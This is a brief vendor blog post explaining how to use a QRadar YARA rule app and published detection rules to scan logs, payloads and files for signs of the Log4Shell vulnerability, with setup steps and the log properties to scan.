Hi guys
I bet all the alarms are on and you are under water right now, so I'll keep it short ! I hope you have already been notified of Adam's blog related to the Detection of Log4Shell (CVE-2021-44228) using QRadar. Please go back to it from time to time as he'll update the blog as the information is coming in.
In the meantime I also wanted to tell you about the release of the YARA app. We hope that it will help you extend your capabilities of investigation so you can respond quicker.
I said I would keep it short, so here is how to proceed with it:
1 - Download the app on the app exchange
You can find the app here on the app exchange: IBM Security QRadar Manager for YARA Rule
Notes:
- An internet access is required only for Github synchronization
- The app is compatible with 7.3.3 Patch 6+ and 7.4.1 Patch 2+ (7.4.0 is not supported)
2 - Configure the app with a token
3 - Go in the YARA tab and create a new Rule.
If you're seeking for help with log4j detection, you can find a rule published by Florian Roth on Github and download the content directly in the app using the following link:
https://github.com/Neo23x0/signature-base/blob/master/yara/expl_log4j_cve_2021_44228.yar
Or do a simple import of your own rules.
4 - Scan the data
Get the properties
In his blog, Adam has proposed to work on the following properties: URL, URL Query String, UrlHost, User Agent, Referrer URL, Request Site, Request URI, API Path.
We have made these properties available on the App Exchange for a few Web Application Firewall and Web Servers.
AWS WAF and Kubernetes: IBM QRadar Content Extension for Amazon AWS
Microsoft IIS: IBM Security QRadar Custom Properties for Microsoft IIS
NGINX: IBM Security QRadar Custom Properties for NGINX
Apache: IBM Security QRadar Custom Properties for Apache
Choose the data
Many options are available to you here.
First set of options is on the data you want to scan, you can choose between 4 possibilities
You might be interested by options 1, 2 and 3 regarding today's investigation:
- Payload: This option allows to bring raw payloads coming from an offense investigation or from a third party too as an example
- Advanced Search (AQL) and Saved Search: These are the searches coming from the Log Activity and the Network Activity. It is a quick way to retrieve all the data from a particular device or a user on a specific period of time as an example.
- Upload File: This option lets you upload an actual suspicious file and scan it with the YARA rules you've defined.
The second half of the screen is letting you choose which rules will be used to scan your data
The app will trigger a scan on the sample of data you selected in the first part, and will return a match / not match result, depending on the options you selected here. You can decide that you need any rule in your namespace to match a payload, all the rules, or only a selection of them.
If you are interested in reading more about QRadar Security Content, you can find the complete list of blog entries here.